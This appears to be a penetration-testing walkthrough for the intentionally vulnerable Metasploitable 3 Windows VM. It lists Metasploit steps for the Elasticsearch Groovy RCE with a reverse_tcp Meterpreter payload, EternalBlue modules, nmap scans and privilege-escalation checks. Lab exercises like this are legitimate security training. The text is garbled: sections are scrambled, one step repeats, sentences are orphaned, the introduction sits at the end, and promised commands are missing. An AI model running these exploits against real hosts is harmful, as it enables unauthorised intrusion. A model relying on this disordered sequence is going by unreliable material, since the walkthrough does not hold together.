Metasploitable 3 Windows Walkthrough

If your initial access yields a low-privilege user account (such as jenkins or iis_iusrs), you must escalate privileges to NT AUTHORITY\SYSTEM.

Local Information Gathering

Metasploitable 3 Windows runs an outdated version of Elasticsearch vulnerable to Remote Code Execution (RCE) via CVE-2015-1427. This vulnerability allows attackers to bypass sandbox restrictions using Groovy scripts.

Exploitation via Metasploit: initialize the Metasploit Framework, then search for the module:

msfconsole
search elasticsearch_groovy

You might find your actual host machine.

If you are an admin but not SYSTEM, use the incognito module in Meterpreter:


set RHOSTS TARGET_IP
set RPORT 9200
set TARGET 1 # Windows Target
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4445

Run an aggressive Nmap scan to discover open ports, standard services, and operating system details:

nmap -p- -sV -sC -O -T4 10.0.2.15

Key Findings

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Exploitation: If both are active, generate a malicious MSI file:

With administrative or system-level access achieved, you can extract sensitive data to simulate a full compromise.

Metasploitable 3 includes services with unquoted paths containing spaces. Identify vulnerable services:

Document every finding, active service port, and successful exploit string.

Depending on the specific build version of the Metasploitable 3 image, it may be vulnerable to MS17-010 (EternalBlue):

use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue

Launch an aggressive TCP port scan using Nmap to discover open ports, operating system details, and service versions:

nmap -p- -sV -sC -O -T4 10.0.2.15

Key Ports and Services Discovered

The scan reveals an extensive attack surface:
FTP (Microsoft ftpd)
Port 22: SSH (OpenSSH 7.1)

If the variable is empty, utilize Metasploit to automatically upload a User-Defined Function (UDF) DLL file to execute system commands:

Weak administrative practices on the machine permit successful dictionary attacks against standard protocols.

, a VM purposefully designed with known vulnerabilities for security testing. This guide focuses on the enumeration and exploitation of common services to achieve a Meterpreter shell.

Exploitation of Metasploitable 3 (Windows Edition)

1. Information Gathering & Enumeration